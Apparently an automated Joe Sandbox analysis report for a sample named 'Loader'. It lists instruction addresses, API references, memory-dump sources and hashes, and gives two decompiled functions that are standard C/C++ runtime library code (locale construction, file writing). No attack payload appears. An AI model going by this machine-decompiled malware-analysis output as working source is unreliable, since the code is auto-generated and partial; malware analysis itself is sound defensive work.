0x00000000
0x00af2a3b
0x00af2a52
0x00af2a52
0x00af2a3d
0x00af2a3d
0x00af2a45
0x00000000
0x00af2a47
0x00af2a47
0x00af2a4a
0x00af2a50
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2a50
0x00af2a45
0x00af2a5b
0x00af2a5b
0x00af2a60
0x00af2a65
0x00af2a69
0x00af2a75
0x00af2a78
0x00af2a7b
0x00af2a85
0x00af2a8d
0x00af2a95
0x00000000
0x00af2a9b
0x00af2a9f
0x00af2aea
0x00af2af3
0x00af2af6
0x00af2af8
0x00af2afc
0x00af2b00
0x00af2b05
0x00af2b0a
0x00af2b00
0x00af2b0e
0x00af2b10
0x00af2b12
0x00af2b16
0x00af2b17
0x00af2b1c
0x00af2b21
0x00af2b17
0x00af2b24
0x00af2b27
0x00af2b2a
0x00af2b2d
0x00af2b30
0x00af2aa1
0x00af2aa4
0x00af2aa7
0x00af2aa9
0x00af2aad
0x00af2ab1
0x00af2ab6
0x00af2abb
0x00af2ab1
0x00af2ac1
0x00af2ac3
0x00af2ac8
0x00af2acd
0x00af2ad2
0x00af2ac8
0x00af2ad3
0x00af2ad7
0x00af2ad7
0x00af2ada
0x00af2ade
0x00af2ae1
0x00af2ae1
0x00000000
0x00af2ae4
0x00000000
0x00af2a95
0x00af2a56
0x00af2a58
0x00af2a58
0x00000000
0x00af2a58
0x00af2b37
0x00af2b38
0x00af2b39
0x00af2b3a
0x00af2b3b
0x00af2b3c
0x00af2b41
0x00af2b45
0x00af2b47
0x00af2b4d
0x00af2b54
0x00af2b57
0x00af2b5a
0x00af2b5b
0x00af2b5c
0x00af2b5f
0x00af2b60
0x00af2b63
0x00af2b69
0x00af2b6b
0x00af2b90
0x00af2b9a
0x00af2ba0
0x00af2ba2
0x00af2ba8
0x00af2baa
0x00af2e0a
0x00af2e0b
0x00000000
0x00af2bb0
0x00af2bb0
0x00af2bb4
0x00af2d22
0x00af2d3f
0x00af2d44
0x00af2d47
0x00af2d49
0x00af2d4f
0x00af2d4f
0x00af2d51
0x00af2d54
0x00af2d56
0x00af2d5c
0x00af2d5c
0x00af2d5e
0x00af2de5
0x00af2de5
0x00af2d64
0x00af2d64
0x00af2d66
0x00af2d6c
0x00af2d6f
0x00af2d72
0x00af2d78
0x00000000
0x00000000
0x00af2d7a
0x00af2d7e
0x00af2da7
0x00af2da7
0x00af2da9
0x00af2d80
0x00af2d80
0x00af2d84
0x00af2d88
0x00af2d8f
0x00af2d95
0x00000000
0x00af2d97
0x00af2d97
0x00af2d9a
0x00af2d9d
0x00af2da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2da5
0x00af2d95
0x00af2db4
0x00af2db4
0x00af2db6
0x00af2de4
0x00af2de4
0x00000000
0x00af2db8
0x00af2db8
0x00af2dbe
0x00af2dbf
0x00af2dc0
0x00af2dc1
0x00af2dc6
0x00af2dcc
0x00af2dcf
0x00af2dd1
0x00af2dd8
0x00af2dda
0x00af2ddc
0x00af2dd3
0x00af2dd3
0x00af2dd4
0x00000000
0x00af2dd4
0x00af2dd1
0x00000000
0x00af2db6
0x00af2dad
0x00af2daf
0x00af2db2
0x00af2db2
0x00000000
0x00af2db2
0x00af2deb
0x00af2deb
0x00af2dec
0x00af2def
0x00af2df5
0x00af2df5
0x00af2dfe
0x00af2e00
0x00000000
0x00af2e02
0x00af2e02
0x00af2e04
0x00000000
0x00af2e06
0x00af2e06
0x00af2e06
0x00af2e04
0x00af2e00
0x00000000
0x00af2bba
0x00af2bba
0x00af2bbf
0x00000000
0x00af2bc5
0x00af2bc5
0x00af2bca
0x00000000
0x00af2bd0
0x00af2bd0
0x00af2bd6
0x00af2bdb
0x00af2bdd
0x00af2be4
0x00af2be5
0x00af2be7
0x00000000
0x00000000
0x00af2bed
0x00af2bed
0x00af2bf1
0x00af2bf7
0x00000000
0x00af2bfd
0x00af2bff
0x00af2c00
0x00af2c03
0x00000000
0x00af2c09
0x00af2c09
0x00af2c0f
0x00af2c14
0x00af2c1e
0x00af2c22
0x00af2c27
0x00af2c2a
0x00af2c2c
0x00000000
0x00af2c2e
0x00af2c2e
0x00af2c30
0x00af2c33
0x00af2c33
0x00af2c36
0x00af2c39
0x00af2c39
0x00af2c44
0x00af2c46
0x00af2c48
0x00000000
0x00000000
0x00af2c48
0x00000000
0x00af2c4a
0x00af2c4a
0x00af2c50
0x00af2c53
0x00af2c53
0x00af2c61
0x00af2c6a
0x00af2c6f
0x00af2c75
0x00af2c78
0x00af2c79
0x00af2c7b
0x00af2c89
0x00af2c89
0x00af2c90
0x00af2cf1
0x00000000
0x00af2c92
0x00af2c92
0x00af2ca0
0x00af2ca5
0x00af2ca8
0x00af2caa
0x00af2e25
0x00af2e27
0x00af2e28
0x00af2e29
0x00af2e2a
0x00af2e2b
0x00af2e2c
0x00af2e31
0x00af2e34
0x00af2e35
0x00af2e3d
0x00af2e44
0x00af2e47
0x00af2e48
0x00af2e4b
0x00af2e4f
0x00af2e50
0x00af2e53
0x00af2e63
0x00af2e86
0x00af2e8b
0x00af2e8e
0x00af2e90
0x00af3146
0x00af3146
0x00af3146
0x00000000
0x00af2e96
0x00af2e96
0x00af2e99
0x00af2e99
0x00af2e9c
0x00af2ea2
0x00af2ea8
0x00af2eab
0x00af2ead
0x00af2eb0
0x00af2eb7
0x00af2eba
0x00af2ec0
0x00000000
0x00000000
0x00af2ec2
0x00af2ec6
0x00af2eef
0x00af2eef
0x00af2ec8
0x00af2ec8
0x00af2ecc
0x00af2ed0
0x00af2ed7
0x00af2edd
0x00000000
0x00af2edf
0x00af2edf
0x00af2ee2
0x00af2ee5
0x00af2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2eed
0x00af2edd
0x00af2efc
0x00af2efc
0x00af2efe
0x00af2f07
0x00af2f0d
0x00af2f10
0x00af2f10
0x00af2f13
0x00af2f16
0x00af2f16
0x00af2f26
0x00af2f34
0x00af2f39
0x00af2f40
0x00af2f42
0x00000000
0x00af2f48
0x00af2f4e
0x00af2f5b
0x00af2f64
0x00af2f6a
0x00af2f77
0x00af2f7e
0x00af2f83
0x00af2f86
0x00af2f88
0x00af31c6
0x00af31cc
0x00af31cd
0x00af31ce
0x00af31cf
0x00af31d0
0x00af31d1
0x00af31d6
0x00af31d9
0x00af31dc
0x00af31dd
0x00af31ef
0x00af31f4
0x00af31f6
0x00af31ff
0x00000000
0x00af31ff
0x00af31f8
0x00af31fb
0x00af31fd
0x00000000
0x00000000
0x00af3205
0x00af2f8e
0x00af2f8e
0x00af2f9c
0x00af2f9f
0x00af2fb5
0x00af2fbc
0x00af2fc1
0x00af2fa1
0x00af2fa1
0x00af2fa9
0x00000000
0x00af2fab
0x00af2fab
0x00af2fb1
0x00af2fb1
0x00af2fa9
0x00af2fc8
0x00af2fcf
0x00af2fd2
0x00af30d0
0x00af30d3
0x00af30e0
0x00af30e3
0x00af30eb
0x00af30eb
0x00af30d5
0x00af30db
0x00af30db
0x00af2fd8
0x00af2fd8
0x00af2fe4
0x00af2fea
0x00af2ff0
0x00af2ff3
0x00af2ff9
0x00af2ffc
0x00af2fff
0x00000000
0x00000000
0x00af3001
0x00af300a
0x00af300e
0x00af3017
0x00af301b
0x00af301c
0x00af3022
0x00af3028
0x00af302e
0x00af3031
0x00000000
0x00000000
0x00af3033
0x00af3052
0x00af3052
0x00af3055
0x00af3072
0x00af3077
0x00af307a
0x00af307c
0x00af30ba
0x00af307e
0x00af307e
0x00af3084
0x00af3089
0x00af3091
0x00af3092
0x00af3092
0x00af30a9
0x00af30b0
0x00af30b3
0x00af30b5
0x00af30b5
0x00af30c0
0x00af30c6
0x00af30c6
0x00af30cb
0x00000000
0x00af30cb
0x00af3035
0x00af3037
0x00af303c
0x00af3042
0x00af304b
0x00af304e
0x00af304e
0x00000000
0x00af3037
0x00af30ee
0x00af30ee
0x00af30f2
0x00af30fa
0x00af3100
0x00af3103
0x00af3109
0x00af310b
0x00af3157
0x00af315d
0x00af31a9
0x00af31a9
0x00af315f
0x00af3164
0x00af3164
0x00af316a
0x00af316e
0x00000000
0x00af3170
0x00af3174
0x00af317d
0x00af3189
0x00af318e
0x00af3197
0x00af319d
0x00af31a0
0x00af31a0
0x00af316e
0x00af31af
0x00af31b7
0x00af31bd
0x00af31c0
0x00af310d
0x00af3113
0x00af311d
0x00af312f
0x00af3136
0x00af3143
0x00000000
0x00af3143
0x00000000
0x00af310b
0x00af2f88
0x00af2f00
0x00af2f00
0x00af3148
0x00af314b
0x00af314c
0x00af314d
0x00af314f
0x00af3156
0x00af3156
0x00000000
0x00af2efe
0x00af2ef7
0x00af2ef9
0x00af2ef9
0x00000000
0x00af2ef9
0x00af2cb0
0x00af2cb0
0x00af2cb3
0x00af2cb8
0x00af2e20
0x00000000
0x00af2cbe
0x00af2cc0
0x00af2cc8
0x00af2cce
0x00af2ccf
0x00af2cd5
0x00af2cd6
0x00af2cdb
0x00af2ce1
0x00af2ce4
0x00af2ce6
0x00af2ce8
0x00af2ce9
0x00af2ce9
0x00af2cf7
0x00af2cf7
0x00af2cfa
0x00af2cfd
0x00af2cff
0x00af2d02
0x00af2d04
0x00af2d04
0x00af2d07
0x00af2d07
0x00af2d0a
0x00af2d0d
0x00000000
0x00af2d13
0x00af2d13
0x00af2d15
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2d15
0x00af2d0d
0x00af2cb8
0x00af2caa
0x00af2c7d
0x00af2c7f
0x00af2c80
0x00af2c83
0x00000000
0x00000000
0x00000000
0x00000000
0x00af2c83
0x00af2c7b
0x00af2c03
0x00000000
0x00af2bf7
0x00af2d1b
0x00000000
0x00af2d1b
0x00af2bca
0x00af2bbf
0x00af2bb4
0x00af2b6d
0x00af2b6d
0x00af2b6f
0x00af2b86
0x00af2b71
0x00af2b71
0x00af2b72
0x00af2b73
0x00af2b74
0x00af2b79
0x00af2e11
0x00af2e14
0x00af2e15
0x00af2e16
0x00af2e18
0x00af2e1f
0x00af2e1f
0x00af2b6b
0x00000000

APIs

Part of subcall function 00AF548F: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,00AE9ED7,00000002,00000000,?,?,?,00AE1D2E,00000001,00000004), ref: 00AF54C1

_free.LIBCMT ref: 00AF2AB6
_free.LIBCMT ref: 00AF2ACD
_free.LIBCMT ref: 00AF2AEA
_free.LIBCMT ref: 00AF2B05
_free.LIBCMT ref: 00AF2B1C

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 10a3e7e9dca7c54247e4662991f5752585de6c596d36ab353e97f26da79b2dc2
Instruction ID: e10fc2d54ff722a4d5a45b87f939a42a4b142ab3c9463685eb88451f149a76a0
Opcode Fuzzy Hash: 10a3e7e9dca7c54247e4662991f5752585de6c596d36ab353e97f26da79b2dc2
Instruction Fuzzy Hash: 90516D72A00708AFDB21EFA9CD42B7AB7F5EB58760B144569FA05D7291E731DD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00AE19B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00AE19B0(void* __ebx, intOrPtr* __ecx) {
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t89;
				intOrPtr* _t96;
				intOrPtr* _t108;
				intOrPtr _t110;
				void* _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				void* _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t118;
				intOrPtr* _t120;
				intOrPtr* _t123;
				signed int _t125;
				intOrPtr _t126;
				intOrPtr* _t127;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				void* _t136;

				_t98 = __ecx;
				_t123 = __ecx;
				E00AE708B(__ecx, 0);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t62 =  *((intOrPtr*)(_t135 + 8));
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				if( *((intOrPtr*)(_t135 + 8)) == 0) {
					E00AE7252(__eflags, "bad locale name");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t136 = _t135 - 0x50;
					_push(__ebx);
					_push(_t123);
					_t117 =  *((intOrPtr*)(_t136 + 0x6c));
					_t96 = _t98;
					__eflags =  *((intOrPtr*)(_t117 + 0x14)) - 0x10;
					_t133 =  *(_t117 + 0x10);
					if( *((intOrPtr*)(_t117 + 0x14)) >= 0x10) {
						_t117 =  *_t117;
					}
					__eflags = _t133 - 0x10;
					if(_t133 >= 0x10) {
						_t125 = _t133 | 0x0000000f;
						__eflags = _t125 - 0x7fffffff;
						_t126 =  >  ? 0x7fffffff : _t125;
						_push(_t126 + 1);
						 *((intOrPtr*)(_t136 + 0x18)) = E00AE42C0(_t96, _t111);
						E00AEA360(_t66, _t117, _t133 + 1);
						_t118 =  *((intOrPtr*)(_t136 + 0x70));
						_t136 = _t136 + 0xc;
						 *((intOrPtr*)(_t136 + 0x2c)) = _t126;
						_t127 =  *((intOrPtr*)(_t136 + 0x68));
						 *(_t136 + 0x28) = _t133;
						goto L9;
					} else {
						_t127 =  *((intOrPtr*)(_t136 + 0x68));
						 *(_t136 + 0x28) = _t133;
						 *((intOrPtr*)(_t136 + 0x2c)) = 0xf;
						asm("movups xmm0, [edi]");
						_t118 =  *((intOrPtr*)(_t136 + 0x64));
						asm("movups [esp+0x18], xmm0");
						__eflags = _t133;
						if(_t133 != 0) {
							L9:
							_push(2);
							_push(0xb0524c);
							L00AE4370(_t136 + 0x20);
						}
					}
					 *((intOrPtr*)( *_t127 + 8))(_t136 + 0x30, _t118);
					__eflags =  *((intOrPtr*)(_t136 + 0x44)) - 0x10;
					_push( *((intOrPtr*)(_t136 + 0x40)));
					_t72 =  >=  ?  *((void*)(_t136 + 0x34)) : _t136 + 0x30;
					_push( >=  ?  *((void*)(_t136 + 0x34)) : _t136 + 0x30);
					_t73 = L00AE4370(_t136 + 0x1c);
					_t112 =  *((intOrPtr*)(_t136 + 0x44));
					__eflags = _t112 - 0x10;
					if(_t112 < 0x10) {
						L14:
						asm("movups xmm1, [esp+0x18]");
						__eflags =  *((intOrPtr*)(_t136 + 0x2c)) - 0x10;
						asm("movq xmm0, [esp+0x28]");
						asm("movd eax, xmm1");
						asm("movq [esp+0x58], xmm0");
						asm("xorps xmm0, xmm0");
						 *_t96 = 0xb051d8;
						_t106 =  >=  ? _t73 : _t136 + 0x48;
						asm("movq [ebx+0x4], xmm0");
						 *((intOrPtr*)(_t136 + 0x10)) =  >=  ? _t73 : _t136 + 0x48;
						 *((char*)(_t136 + 0x18)) = 1;
						asm("movups [esp+0x50], xmm1");
						E00AE9EAD(_t136 + 0x14, _t96 + 4);
						_t113 =  *((intOrPtr*)(_t136 + 0x64));
						_t136 = _t136 + 8;
						 *_t96 = 0xb05238;
						__eflags = _t113 - 0x10;
						if(_t113 < 0x10) {
							L18:
							 *((intOrPtr*)(_t96 + 0xc)) =  *((intOrPtr*)(_t136 + 0x64));
							 *_t96 = 0xb05244;
							 *((intOrPtr*)(_t96 + 0x10)) =  *((intOrPtr*)(_t136 + 0x68));
							return _t96;
						} else {
							_t108 =  *((intOrPtr*)(_t136 + 0x48));
							_t114 = _t113 + 1;
							_t79 = _t108;
							__eflags = _t114 - 0x1000;
							if(_t114 < 0x1000) {
								L17:
								_push(_t114);
								E00AE906D(_t108);
								_t136 = _t136 + 8;
								goto L18;
							} else {
								_t108 =  *((intOrPtr*)(_t108 - 4));
								_t114 = _t114 + 0x23;
								__eflags = _t79 - _t108 + 0xfffffffc - 0x1f;
								if(__eflags > 0) {
									goto L20;
								} else {
									goto L17;
								}
							}
						}
					} else {
						_t110 =  *((intOrPtr*)(_t136 + 0x30));
						_t115 = _t112 + 1;
						_t89 = _t110;
						__eflags = _t115 - 0x1000;
						if(_t115 < 0x1000) {
							L13:
							_push(_t115);
							_t73 = E00AE906D(_t110);
							_t136 = _t136 + 8;
							goto L14;
						} else {
							_t108 =  *((intOrPtr*)(_t110 - 4));
							_t114 = _t115 + 0x23;
							__eflags = _t89 - _t108 + 0xfffffffc - 0x1f;
							if(__eflags > 0) {
								E00AED24F(_t96, _t108, _t114, __eflags);
								L20:
								E00AED24F(_t96, _t108, _t114, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t127);
								_t129 =  *((intOrPtr*)(_t136 + 8));
								asm("xorps xmm0, xmm0");
								_push(_t118);
								_t120 = _t108;
								 *_t120 = 0xb051d8;
								asm("movq [eax], xmm0");
								E00AE9EAD(_t129 + 4, _t120 + 4);
								 *_t120 = 0xb05244;
								 *((intOrPtr*)(_t120 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc));
								 *((intOrPtr*)(_t120 + 0x10)) =  *((intOrPtr*)(_t129 + 0x10));
								return _t120;
							} else {
								goto L13;
							}
						}
					}
				} else {
					E00AE7508(__ecx, __ecx, _t62); // executed
					return _t123;
				}
			}

0x00ae19b0
0x00ae19b3
0x00ae19b5
0x00ae19bc
0x00ae19c3
0x00ae19c7
0x00ae19ca
0x00ae19ce
0x00ae19d1
0x00ae19d4
0x00ae19d7
0x00ae19da
0x00ae19de
0x00ae19e2
0x00ae19e9
0x00ae19ed
0x00ae19f6
0x00ae1a0d
0x00ae1a12
0x00ae1a13
0x00ae1a14
0x00ae1a15
0x00ae1a16
0x00ae1a17
0x00ae1a18
0x00ae1a19
0x00ae1a1a
0x00ae1a1b
0x00ae1a1c
0x00ae1a1d
0x00ae1a1e
0x00ae1a1f
0x00ae1a20
0x00ae1a23
0x00ae1a25
0x00ae1a27
0x00ae1a2b
0x00ae1a2d
0x00ae1a31
0x00ae1a34
0x00ae1a36
0x00ae1a36
0x00ae1a38
0x00ae1a3b
0x00ae1a6a
0x00ae1a6d
0x00ae1a6f
0x00ae1a75
0x00ae1a7e
0x00ae1a85
0x00ae1a8a
0x00ae1a8e
0x00ae1a91
0x00ae1a95
0x00ae1a99
0x00000000
0x00ae1a3d
0x00ae1a3d
0x00ae1a41
0x00ae1a45
0x00ae1a4d
0x00ae1a50
0x00ae1a54
0x00ae1a59
0x00ae1a5b
0x00ae1a9d
0x00ae1a9d
0x00ae1a9f
0x00ae1aa8
0x00ae1aa8
0x00ae1a5b
0x00ae1ab7
0x00ae1aba
0x00ae1ac3
0x00ae1ac7
0x00ae1ad0
0x00ae1ad1
0x00ae1ad6
0x00ae1ada
0x00ae1add
0x00ae1b0c
0x00ae1b0c
0x00ae1b15
0x00ae1b1a
0x00ae1b20
0x00ae1b24
0x00ae1b2a
0x00ae1b2d
0x00ae1b33
0x00ae1b36
0x00ae1b3e
0x00ae1b47
0x00ae1b4d
0x00ae1b52
0x00ae1b57
0x00ae1b5b
0x00ae1b5e
0x00ae1b64
0x00ae1b67
0x00ae1b92
0x00ae1b9c
0x00ae1ba2
0x00ae1ba8
0x00ae1baf
0x00ae1b69
0x00ae1b69
0x00ae1b6d
0x00ae1b6e
0x00ae1b70
0x00ae1b76
0x00ae1b88
0x00ae1b88
0x00ae1b8a
0x00ae1b8f
0x00000000
0x00ae1b78
0x00ae1b78
0x00ae1b7b
0x00ae1b83
0x00ae1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00ae1b86
0x00ae1b76
0x00ae1adf
0x00ae1adf
0x00ae1ae3
0x00ae1ae4
0x00ae1ae6
0x00ae1aec
0x00ae1b02
0x00ae1b02
0x00ae1b04
0x00ae1b09
0x00000000
0x00ae1aee
0x00ae1aee
0x00ae1af1
0x00ae1af9
0x00ae1afc
0x00ae1bb2
0x00ae1bb7
0x00ae1bb7
0x00ae1bbc
0x00ae1bbd
0x00ae1bbe
0x00ae1bbf
0x00ae1bc0
0x00ae1bc1
0x00ae1bc5
0x00ae1bc8
0x00ae1bc9
0x00ae1bcf
0x00ae1bd5
0x00ae1bdd
0x00ae1be5
0x00ae1bf1
0x00ae1bf6
0x00ae1bfb
0x00000000
0x00000000
0x00000000
0x00ae1afc
0x00ae1aec
0x00ae19f8
0x00ae19fa
0x00ae1a05
0x00ae1a05

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AE19B5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AE19FA

Part of subcall function 00AE7508: _Yarn.LIBCPMT ref: 00AE7527
Part of subcall function 00AE7508: _Yarn.LIBCPMT ref: 00AE754B

Strings

bad locale name, xrefs: 00AE1A08

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: f0b4508ccbcf867af6ef911ab26de434d9b16b9eb7089a2a1825fc4b30652b36
Instruction ID: 3a507e1b1fb550144ed206c9a7b47d14c7eca261eed1d8cddc824fe39f03f66b
Opcode Fuzzy Hash: f0b4508ccbcf867af6ef911ab26de434d9b16b9eb7089a2a1825fc4b30652b36
Instruction Fuzzy Hash: 3BF030B0505B808ED370DF7A8514747BEE0AF25310F048E1DE4CAC7A52D375E548CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00AF877B Relevance: 4.7, APIs: 3, Instructions: 170
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00AF877B(signed int _a4, void* _a8, signed int _a12) {
				long _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v40;
				char _v44;
				signed int _t59;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t81;
				signed int _t84;
				signed int _t91;
				signed int _t93;
				intOrPtr _t95;
				signed int _t100;
				intOrPtr _t101;
				void* _t102;
				signed int _t105;
				signed int _t107;
				void* _t109;

				_t93 = _a12;
				_v8 = _t93;
				_t105 = _a4;
				_t102 = _a8;
				_v16 = _t102;
				if(_t93 == 0) {
					L37:
					__eflags = 0;
					return 0;
				}
				_t113 = _t102;
				if(_t102 != 0) {
					_t100 = _t105 >> 6;
					_t59 = (_t105 & 0x0000003f) * 0x38;
					_v20 = _t100;
					_t101 =  *((intOrPtr*)(0xb38530 + _t100 * 4));
					_v12 = _t59;
					_t91 =  *((intOrPtr*)(_t101 + _t59 + 0x29));
					__eflags = _t91 - 2;
					if(_t91 == 2) {
						L6:
						__eflags =  !_t93 & 0x00000001;
						if(__eflags == 0) {
							goto L2;
						}
						_t59 = _v12;
						L8:
						__eflags =  *(_t101 + _t59 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E00AF9E59(_t105, 0, 0, 2);
							_t109 = _t109 + 0x10;
						}
						_t66 = E00AF8322(_t101, __eflags, _t105); // executed
						__eflags = _t66;
						if(_t66 == 0) {
							_t95 =  *((intOrPtr*)(0xb38530 + _v20 * 4));
							_t68 = _v12;
							__eflags =  *((char*)(_t95 + _t68 + 0x28));
							if( *((char*)(_t95 + _t68 + 0x28)) >= 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t71 = WriteFile( *(_t95 + _t68 + 0x18), _v16, _v8,  &_v40, 0);
								__eflags = _t71;
								if(_t71 == 0) {
									_v44 = GetLastError();
								}
								goto L27;
							}
							_t81 = _t91;
							__eflags = _t81;
							if(_t81 == 0) {
								E00AF8393( &_v44, _t105, _t102, _v8); // executed
								goto L16;
							}
							_t84 = _t81 - 1;
							__eflags = _t84;
							if(_t84 == 0) {
								_t83 = E00AF8557( &_v44, _t105, _t102, _v8);
								goto L16;
							}
							__eflags = _t84 != 1;
							if(_t84 != 1) {
								goto L33;
							}
							_t83 = E00AF846E( &_v44, _t105, _t102, _v8);
							goto L16;
						} else {
							__eflags = _t91;
							if(__eflags == 0) {
								_t83 = E00AF7F0E(__eflags,  &_v44, _t105, _t102, _v8);
								L16:
								L14:
								L27:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t72 = _v28;
								__eflags = _t72;
								if(_t72 != 0) {
									return _t72 - _v24;
								}
								_t74 = _v32;
								__eflags = _t74;
								if(_t74 == 0) {
									_t102 = _v16;
									L33:
									__eflags =  *( *((intOrPtr*)(0xb38530 + _v20 * 4)) + _v12 + 0x28) & 0x00000040;
									if(__eflags == 0) {
										L35:
										 *((intOrPtr*)(E00AEF21B(__eflags))) = 0x1c;
										_t64 = E00AEF208(__eflags);
										 *_t64 =  *_t64 & 0x00000000;
										L3:
										return _t64 | 0xffffffff;
									}
									__eflags =  *_t102 - 0x1a;
									if(__eflags == 0) {
										goto L37;
									}
									goto L35;
								}
								_t107 = 5;
								__eflags = _t74 - _t107;
								if(__eflags != 0) {
									_t64 = E00AEF1E5(_t74);
								} else {
									 *((intOrPtr*)(E00AEF21B(__eflags))) = 9;
									_t64 = E00AEF208(__eflags);
									 *_t64 = _t107;
								}
								goto L3;
							}
							__eflags = _t91 - 1 - 1;
							if(_t91 - 1 > 1) {
								goto L33;
							}
							E00AF82BA( &_v44, _t102, _v8);
							goto L14;
						}
					}
					__eflags = _t91 - 1;
					if(_t91 != 1) {
						goto L8;
					}
					goto L6;
				}
				L2:
				 *(E00AEF208(_t113)) =  *_t62 & 0x00000000;
				 *((intOrPtr*)(E00AEF21B( *_t62))) = 0x16;
				_t64 = E00AED23F();
				goto L3;
			}

0x00af8783
0x00af8786
0x00af878b
0x00af878f
0x00af8792
0x00af8797
0x00af894e
0x00af894e
0x00000000
0x00af894e
0x00af879d
0x00af879f
0x00af87c5
0x00af87cb
0x00af87ce
0x00af87d1
0x00af87d8
0x00af87db
0x00af87df
0x00af87e2
0x00af87e9
0x00af87ed
0x00af87ef
0x00000000
0x00000000
0x00af87f1
0x00af87f4
0x00af87f4
0x00af87f9
0x00af8802
0x00af8807
0x00af8807
0x00af880b
0x00af8811
0x00af8813
0x00af8851
0x00af8858
0x00af885b
0x00af8860
0x00af88b1
0x00af88b4
0x00af88b5
0x00af88c1
0x00af88c7
0x00af88c9
0x00af88d1
0x00af88d1
0x00000000
0x00af88d4
0x00af8865
0x00af8865
0x00af8868
0x00af88a1
0x00000000
0x00af88a1
0x00af886a
0x00af886a
0x00af886d
0x00af8891
0x00000000
0x00af8891
0x00af886f
0x00af8872
0x00000000
0x00000000
0x00af8881
0x00000000
0x00af8815
0x00af8815
0x00af8817
0x00af8844
0x00af8849
0x00af8834
0x00af88d7
0x00af88da
0x00af88db
0x00af88dc
0x00af88dd
0x00af88e0
0x00af88e2
0x00000000
0x00af8949
0x00af88e4
0x00af88e7
0x00af88e9
0x00af8915
0x00af8918
0x00af8925
0x00af892a
0x00af8931
0x00af8936
0x00af893c
0x00af8941
0x00af87b9
0x00000000
0x00af87b9
0x00af892c
0x00af892f
0x00000000
0x00000000
0x00000000
0x00af892f
0x00af88ed
0x00af88ee
0x00af88f0
0x00af890a
0x00af88f2
0x00af88f7
0x00af88fd
0x00af8902
0x00af8902
0x00000000
0x00af88f0
0x00af881b
0x00af881e
0x00000000
0x00000000
0x00af882c
0x00000000
0x00af8831
0x00af8813
0x00af87e4
0x00af87e7
0x00000000
0x00000000
0x00000000
0x00af87e7
0x00af87a1
0x00af87a6
0x00af87ae
0x00af87b4
0x00000000

APIs

Part of subcall function 00AF7F0E: GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00AF7F56

WriteFile.KERNEL32(?,?,?,00B12F58,00000000,00000000,00000000,00000000,?,00B12F58,00000010,00AF02B3,00000000,00000000,00000000), ref: 00AF88C1
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00AF88CB
__dosmaperr.LIBCMT ref: 00AF890A

Memory Dump Source

